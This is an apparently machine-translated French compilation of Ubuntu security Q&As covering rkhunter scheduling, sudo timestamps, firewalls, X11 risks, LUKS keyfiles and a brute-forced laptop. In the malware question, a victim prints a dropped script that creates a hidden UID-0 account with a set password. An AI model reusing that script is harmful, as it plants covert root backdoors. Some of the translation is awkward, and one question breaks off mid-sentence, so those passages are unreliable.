Ubuntu – Exécutez rkhunter régulièrement sur un système de bureau

Je veux recevoir un avertissement sur mon bureau lorsque rkhunter trouve quelque chose d’étrange sur mon système.

J’ai mis sur liste blanche certains fichiers et répertoires qui semblent corrects dans /etc/rkhunter.conf donc je n’ai plus d’avertissement.

Maintenant, je veux mettre cette commande quelque part:

 sudo rkhunter --checkall --report-warnings-only | while read OUTPUT; do notify-send "$OUTPUT"; done
 

Je sais utiliser cron mais cela ne fonctionne pas, car mon ordinateur fonctionne à des heures irrégulières, alors où dois-je le mettre pour qu’il soit exécuté une fois par jourmais pas pendant le démarrage du système?L’optimal serait de 30 minutes après le démarrage.

Meilleure réponse

  • Solution avec anachron et notify-send 

    La réponse au problème est un anachron qui exécute automatiquement les commandescomme root, où root a besoin d’accéder à la session dbus de l’utilisateur principal.

    1. Donnez un accès root à votre session de bureau (en tant qu’utilisateur)

    Pour permettre à l’utilisateur root d’accéder au bureau de l’utilisateur par défaut, vous devez d’abord définir DBUS_SESSION_BUS_ADDRESS variable. Par défaut, cron n’a pas accès à la variable qui change à chaque démarrage du système. Pour y remédier, placez le script suivant dans votre répertoire personnel et appelez-le ~/dbus-session-export 

     #!/bin/sh
    touch ~/.dbus/Xdbus
    chmod 600 ~/.dbus/Xdbus
    env | grep DBUS_SESSION_BUS_ADDRESS > ~/.dbus/Xdbus
    echo 'export DBUS_SESSION_BUS_ADDRESS' >> ~/.dbus/Xdbus
    exit 0
     

    Donnez-lui des droits exécutables:

     chmod +x ~/dbus-session-export
     

    Et appelez-le dans vos programmes de démarrage.
    Cela va créer / mettre à jour le fichier ~/.dbus/Xdbus contenant la variable d’environnement Dbus requise pour anachron à utiliser à chaque démarrage du système.

    2. Script Cron (en tant que root)

    Mettez un script dans le dossier /etc/cron.daily/ et le rendre exécutable:

     sudo touch /etc/cron.daily/rkhunter-check
    sudo chmod +x /etc/cron.daily/rkhunter-check
     

    Modifier le fichier gksu gedit /etc/cron.daily/rkhunter-check 

     #!/usr/bin/env bash
    sleep 1800 # wait 30 minutes in case the script is called directly at boot
    MAINUSER="$(awk -F: '$3==1000{print $1}' /etc/passwd)"
    if [ -r "/home/$MAINUSER/.dbus/Xdbus" ]; then
    . "/home/$MAINUSER/.dbus/Xdbus"
    fi
    su $MAINUSER -c 'notify-send "starting rkhunter scan... "'
    rkhunter --checkall --report-warnings-only | while read OUTPUT; do
    if [ "$OUTPUT" != "" ]; then
    OUTPUT="${OUTPUT//[\`\"\']/}"
    su $MAINUSER -c $"notify-send \"rkhunter: $OUTPUT\""
    fi
    done
     

  • Ubuntu – Comment mettre à jour ntpd vers la dernière version pour corriger la dernière vulnérabilité? [dupliquer]

    Cette semaine, une nouvelle attaque contre le Network Time Protocol Daemon (ntpd) a été démontrée, voir cet article. Cela pourrait potentiellement faire des ravages avec mon site Web HTTPS ou d’autres services sensibles au temps que j’utilise.

    Selon l’article, pour rester en sécurité, les clients et les serveurs doivent exécuter au moins la version NTP4.2.8p4.

    Fonctionnement ntpd --version sur ma machine Ubuntu Server 14.04.3 LTS me donne ntpd 4.2.6p5 qui est encore vulnérable. C’est même après avoir couru apt-get update ,  apt-get upgrade et apt-get dist-upgrade .

    Apparemment, je peux moi-même télécharger la dernière version sur ntp.org. Mais je ne sais pas si cela entrera en conflit avec mon installation ntpd existante effectuée via apt-get . De plus, ils ne proposent que le téléchargement via HTTP et leur méthode pour garantir l’authenticité consiste à utiliser une somme de contrôle de hachage MD5… J’ai hâte de recevoir mon patch NSA avec porte dérobée. Je souhaite vraiment que les gens utilisent les signatures GPG.

    1. Ubuntu prévoit-il de publier un correctif de sécurité pour mettre à niveau ntpd vers 4.2.8p4 prochainement? De quoi aura-t-on besoin pour obtenir le correctif?

    2. Si j’ai lu le code et que la version 4.2.8p4 disponible au téléchargement sur le site Web ntp.org était fiable, comment puis-je l’installer sans conflits?

    Meilleure réponse

    1. Installer checkinstall , lis man checkinstall et utilise checkinstall pour garder une trace des fichiers installés.

    2. Téléchargez, compilez et installez la version de ntpd dont vous avez besoin, en écrasant Ubuntu. Vérifiez que vous pouvez make uninstall (en lisant Makefile ), ou gardez une trace des fichiers installés.

    3. Quand Ubuntu se met à jour ntpd vers ou au-delà de la version souhaitée, retournez dans le répertoire source et make uninstall . ensuite sudo apt-get install --reinstall ntpd 

  • Ubuntu – Comment forcer sudo à toujours demander un mot de passe après s’être réveillé de la suspension d’Ubuntu 15.04+ (systemd) Versions précédentes d’Ubuntu (Upstart)

    Supposons que j’exécute une commande avec sudo , alors si j’utilise sudo dans les 15/5 minutes suivantes (je ne sais pas combien de temps il se souvient de moi), il ne me demandera pas de mot de passe. Cela ne m’invitera à nouveau que si je ne l’ai pas utilisé pendant au moins aussi longtemps.

    Cependant, si je suspend ma machine, la réveille et me connecte avant la fin de cette période, je peux simplement exécuter un sudo commande à nouveau et il ne me demandera pas mon mot de passe car je ne l’ai pas laissé pendant un certain temps.

    Alors, comment puis-je faire en sorte que peu importe combien de temps je n’ai pas utilisé sudo pour, il me demandera certainement un mot de passe après la suspension une fois que je me suis reconnecté, même si je suis encore dans ce laps de temps où les 15/5 minutes de ne pas utiliser sudo pas encore passé?

    La chose la plus probable qui fonctionnera est de lui faire exécuter une commande pour supprimer tous les caches d’identité pour sudo lors de l’exécution d’une certaine commande qui est exécutée au réveil.

    J’utilise Ubuntu GNOME 15.10 avec GNOME 3.18.

    Meilleure réponse

  • De man sudo :

          -K, --remove-timestamp
                     Similar to the -k option, except that it removes the user's
                     cached credentials entirely and may not be used in conjunc‐
                     tion with a command or other option.  This option does not
                     require a password.  Not all security policies support cre‐
                     dential caching.
     

    Donc, ce que vous voulez, c’est que votre utilisateur exécute sudo -K chaque fois que le système suspend.

    Ubuntu 15.04+ (systemd)

    Cela peut être fait sur Ubuntu 15.04+ en plaçant un script dans /lib/systemd/system-sleep/ .

    1. Courir sudo nano /lib/systemd/system-sleep/disable_sudo_user (remplacer user avec le nom d’utilisateur de votre utilisateur pour plus de commodité);
    2. Collez le script suivant (remplacez user avec le nom d’utilisateur de votre utilisateur):
     #!/bin/sh
    case $1/$2 in
        pre/suspend)
            su user -c 'sudo -K'
            ;;
    esac
     
    1. FrappéCTRL+O, ENTERetCTRL+X;

    2. Courir sudo chmod o+x /lib/systemd/system-sleep/disable_sudo_user ;


    Pour l’activer également pour l’hibernation / sommeil hybride, utilisez plutôt ce script:

     #!/bin/sh
    case $1 in
        pre)
            su user -c 'sudo -K'
            ;;
    esac
     

    Versions précédentes d’Ubuntu (Upstart)

    Cela peut être fait sur les versions précédentes d’Ubuntu en plaçant un script dans /etc/pm/sleep.d/ .

    1. Courir sudo nano /etc/pm/sleep.d/disable_sudo_user (remplacer user avec le nom d’utilisateur de votre utilisateur pour plus de commodité);
    2. Collez le script suivant (remplacez user avec le nom d’utilisateur de votre utilisateur):
     #!/bin/sh
    case $1 in
        suspend)
            su user -c 'sudo -K'
            ;;
    esac
     
    1. FrappéCTRL+O, ENTERetCTRL+X;

    2. Courir sudo chmod o+x /etc/pm/sleep.d/disable_sudo_user ;


    Pour l’activer également pour l’hibernation, utilisez plutôt ce script:

     #!/bin/sh
    case $1 in
    suspend|hybernate)
    su user -c 'sudo -K'
    ;;
    esac
     

  • Ubuntu – Comment renommer des éléments dans des endroits que je ne possède pas, comme /, et pourquoi ne devrais-je pas

    J’ai un Permission denied un message lorsque vous essayez de renommer des fichiers et des dossiers dans des endroits comme / ,  /usr et les répertoires personnels d’autres personnes. Je suis administrateur. Comment puis-je faire ceci?

    De plus, j’ai entendu dire que renommer des fichiers et des dossiers comme celui-ci pouvait être dangereux. Est-ce vrai? Dois-je pas faire ça?

    Meilleure réponse

  • Il est généralement mauvais de renommer des éléments qui résident directement dans / ou directement dans l’un de ses sous-dossiers (comme /usr ). En fait, vous devez éviter de renommer quoi que ce soit en dehors de votre répertoire personnel, sauf si vous êtes sûr que vous devez le faire et que vous le faites correctement. Sinon, vous pourriez renommer quelque chose de critique pour le fonctionnement de votre système Ubuntu, le faisant cesser de fonctionner (ou cesser de fonctionner correctement).

    Si vous vous demandez quelque chose comme la question ci-dessus, vous devriez envisager de publier une nouvelle question, où vous fournissez plus d’informations sur ce que vous souhaitez accomplir, ouajouter des détailssi vous avez déjà posé votre question.

    Dans le terminal

    Pour renommer un fichier ou un dossier dans le terminal, utilisez la commande mv (la même commande utilisée pour déplacer un fichier ou un dossier d’un endroit à un autre sur la même partition):

     mv old-name new-name 

    Si le fichier ou le dossier réside dans un dossier où vous n’avez pas d’autorisations d’écriture (ce qui est souvent le cas lorsque vous n’êtes pas son propriétaire), vous devez exécuter cette commande en tant que root avec sudo:

     sudo mv old-name new-name 

    (Ou vous pouvez utiliser sudo -u username mv old-name new-name pour effectuer l’opération de changement de nom en tant root utilisateur, si vous préférez. De plus, veuillez noter que si vous avez des autorisations d’écriture sur un répertoire que vous ne possédez pas, mais que son bit collant est défini, vous ne pourrez pas renommer à l’intérieur des fichiers qui ne vous appartiennent pas, sans utiliser sudo .)

    À Nautilus

    Vous pouvez exécuter le gestionnaire de fichiers, Nautilus, comme root en appuyantAlt+F2et exécuter la commande gksu nautilus . Cela vous permettra de renommer des fichiers et des dossiers n’importe où et de faire toutes sortes d’autres choses puissantes et dangereuses.

    Soyez prudent et rappelez-vous quetous les programmes que vous lancez (comme en ouvrant des documents) à partir d’un root La fenêtre Nautilus fonctionnera également comme root et assurez-vous de fermer la fenêtre lorsque vous avez terminé afin de ne plus la confondre avec une fenêtre Nautilus régulière et plus sûre.

    Mais ne renommez pas des éléments en dehors de votre répertoire personnel, sauf si vousvraimentSais ce que tu fais. Cela cassera probablement gravement votre système Ubuntu. Et cela n’accomplira probablement pas tout ce que vous essayez de réaliser.

    Merci à Richard d’avoir aidé à clarifier les conditions dans lesquelles un utilisateur peut renommer un élément sans Permission denied 

  • Ubuntu – Un pare-feu est-il vraiment nécessaire de nos jours? [fermé]

    dois-je installer quelque chose comme gufw?

    Meilleure réponse

  • Oui, plus que jamais. Internet n’a pas beaucoup changé depuis les temps anciens. Un pare-feu est donc toujours une nécessité de nos jours. Un pare-feu comme gufw, avec des règles de base fonctionne. Utilisez iptables, si vous êtes un geek CLI;)

  • Ubuntu – Existe-t-il une alternative à X.org prise en charge par Ubuntu (c’est-à-dire avec la sécurité à l’esprit)

    question

    (ce que je recherche?)

    Je cherche des alternatives à X.org, qui est le X-Server le plus utilisé dans les systèmes graphiques de linux aujourd’hui (ce qui signifie aussi dans Ubuntu). Connaissez-vous des alternatives?

    Je connais déjà DirectFB et Wayland. Avec Wayland, je ne suis pas vraiment sûr qu’il puisse être considéré comme une alternative de remplacement ou simplement une sorte d’addon.

    Je pose également des questions sur Ubuntu en particulier dans la question. Je me demandais donc s’il y avait une alternative (déjà emballée comme emballée pour Ubuntu).Si quelqu’un connaît une alternative « pas encore ubuntu », j’apprécierais néanmoins une réponse car je suppose que ubuntu englobe le développement et le progrès (quelles alternatives pourraient induire). Je vous remercie.

    Contexte

    (pourquoi je le cherche?)

    L’aspect clé ici est la sécurité.
    Bien qu’ubuntu offre une sécurité à bien des égards

    • LUKS (Linux Unified Key Setup) pour le chiffrement de disque
    • AppArmor MAC (Mandatory Access Control) pour les attaques zero day
    • signatures gnupg (Gnu Privacy Guard), communication sécurisée par courrier

    il est triste de savoir que le serveur X.org pourrait donner beaucoup de sécurité. La préoccupation est exprimée dans de nombreux endroits. C’est par exemple:

     The X server allows an X client to:
    
     - Snoop on the screen by reading its contents.
     - Snoop on the keyboard.
     - Take control of other X clients by sending them keyboard and mouse events.
     - Impersonate other X clients by using their names in window title bars.
     - Discover what other X clients are running.
     - Steal the input focus.
     - Deny service by grabbing the pointer or keyboard or the whole server.
     - Deny service by consuming the X server's resources. strong text
     

    source: http://plash.beasts.org/wiki/X11Security

    Ce qui précède signifierait que certains logiciels exécutés sur le serveur X (c’est presque tous les programmes qui ont une sortie graphique – ne fonctionne pas sur la ligne de commande) peuvent se faire un enregistreur de frappe.
    Le système de fichiers linux conserve les autorisations définies et par ceUtilisateur Apeut être limité à l’accèsUtilisateur Bles fichiers.
    Dans le serveur X.org/X, il est difficile de garderprogramme Ad’accéder aux ressources du serveur X deprogramme B. Donc, en ayant installé un addon firefox malveillant + en utilisant un sudo ... sur gnome-terminal 

    Ubuntu – Comment gérer les logiciels malveillants sur l’ordinateur portable

    Je suis assez certain que mon ordinateur portable Ubuntu 13.10 est infecté par une sorte de malware.

    De temps en temps, je trouve un processus / lib / sshd (appartenant à root) en cours d’exécution et consommant beaucoup de processeurs. Ce n’est pas le serveur sshd qui exécute / usr / sbin / sshd.

    Le binaire a les autorisations –wxrw-rwt et il génère et génère des scripts dans le répertoire / lib. Un récent est nommé 13959730401387633604 et il fait ce qui suit

     #!/bin/sh
    exec 1>/dev/null
    exec 2>/dev/null
    useradd -g 0 -u 0 -o gusr
    echo gusr:chaonimabi123456123 | chpasswd
     

    L’utilisateur gusr a été créé indépendamment par le malware, puis le chpasswd se bloque tout en consommant 100% de CPU.

    Jusqu’à présent, j’ai identifié que l’utilisateur gusr a été ajouté aux fichiers dans / etc /

     /etc/group
    /etc/gshadow
    /etc/passwd
    /etc/shadow
    /etc/subgid
    /etc/subuid
     

    Il semble que le malware ait fait des copies de tous ces fichiers avec le suffixe « -« . La liste complète des fichiers / etc / qui ont été modifiés par root est disponible ici.

    De plus, le fichier / etc / hosts a été changé en ceci.

    Le / lib / sshd commence par s’ajouter à la fin du fichier /etc/init.d/rc.local!

    J’ai supprimé l’utilisateur, supprimé les fichiers, tué l’arborescence des fichiers traités, changé mes mots de passe et supprimé les clés publiques ssh.

    Je suis conscient que je suis essentiellement vissé, et je vais probablement réinstaller tout le système. Néanmoins, depuis que je me connecte à plusieurs autres machines, il serait bon d’essayer au moins de le supprimer et de comprendre comment je l’ai obtenu. Toute suggestion sur la façon de procéder serait appréciée.

    Il semble qu’ils soient entrés le 25 mars en se connectant à la racine avec un forçage brutal. Je n’avais aucune idée que root ssh est activé par défaut dans Ubuntu. Je l’ai désactivé et mis en place des denyhosts.

    La connexion était de 59.188.247.236, quelque part à Hong Kong, apparemment.

    J’ai obtenu l’ordinateur portable d’EmperorLinux, et ils ont activé l’accès root. Si vous en avez un et que vous utilisez sshd, méfiez-vous.

    Meilleure réponse

  • Tout d’abord, retirez cette machine du réseau maintenant!

    Deuxièmement, pourquoi avez-vous activé le compte root? Vous ne devriez vraiment pas activer le compte root sauf si vous avez une très bonne raison de le faire.

    Troisièmement, oui, la seule façon de vous assurer que vous êtes propre est de faire une installation propre. Il est également conseillé de recommencer à zéro et de ne pas revenir à une sauvegarde, car vous ne pouvez jamais être sûr quand tout a commencé.

    Je vous suggère également de configurer un pare-feu lors de votre prochaine installation et de refuser toutes les connexions entrantes:

     sudo ufw default deny incoming
     

    puis autorisez ssh avec:

     sudo ufw allow ssh
     

  • Ubuntu – Cryptage LUKS, en-tête sur une clé USB dongle

    Je vais installer Linux de la manière LUKS / LVM, afin d’avoir un disque crypté.

    De plus, je voudrais mettre l’en-tête et la phrase secrète dans une clé USB.

    Ainsi, au lieu de saisir la phrase secrète, je ne branche que le dongle du lecteur USB.

    Est-ce possible et comment?

    Meilleure réponse

  • J’écris maintenant à partir de la machine qui fonctionne exactement de cette façon.

    1. Tout d’abord, vous devrez mettre /boot dossier sur le dongle.
    2. Chiffrez le disque avec le fichier de clés et placez également le fichier de clés dans le dongle de démarrage.
    3. Éditer /etc/crypttab , ajoutez cette ligne

       sda2_crypt UUID=14-88 /dev/disk/by-uuid/88-14:/rootfs.key     luks,keyscript=/lib/cryptsetup/scripts/passdev
       

    où sda2_crypt est un nom arbitraire, le premier UUID est de la partition racine chiffrée, le second – de la partition dongle et rootfs.key est le nom du fichier de clés.

    1. Mettez ensuite à jour votre /etc/fstab en conséquence.
    2. Montez le dongle comme /boot et fait update-initramfs 

    Cela devrait suffire. Différentes instructions vous suggèrent d’ajouter des arguments de démarrage du noyau, mais dans mon cas, cela a fonctionné sans. Si vous souhaitez utiliser un mot de passe au lieu d’un fichier de clés, modifiez simplement /etc/crypttab et fait update-initramfs 

  • Ubuntu – Ubuntu installé aux côtés d’un système Windows infecté

    Mon analyse antivirus a trouvé quelque chose sur Windows 7. Aucune information pour l’instant. Cependant, je pensais installer Ubuntu avec Windows. Cela pourrait-il être dangereux pour Ubuntu d’attraper quelque chose de malveillant sur le système Windows?

    Meilleure réponse

  • L’option la plus sûre serait d’installer Ubuntu sur une partition différente, mais selon ce post, cela semble sûr. Ici, je le cite:

    Wubi ne sera pas affecté par les virus Windows. Wubi est presque identique à l’installation standard d’Ubuntu, à l’exception du fait que tout se trouve à l’intérieur d’un fichier sur la partition Windows. Par conséquent, il ne peut pas exécuter les exécutables Windows (y compris les virus). La seule façon d’obtenir un virus de Wubi est de télécharger quelque chose contenant un virus, de transférer le fichier vers Windows, de démarrer Windows, puis d’exécuter le virus à partir de Windows.

    Voir aussi ce fil

    EDIT De plus, si vous souhaitez exécuter des programmes dans wine à partir de votre installation Windows infectée, en particulier en tant que root, vous pouvez ouvrir votre système à l’infection. De plus, l’option la plus sûre est de tout formater puis d’installer Ubuntu– ObsessiveFOSS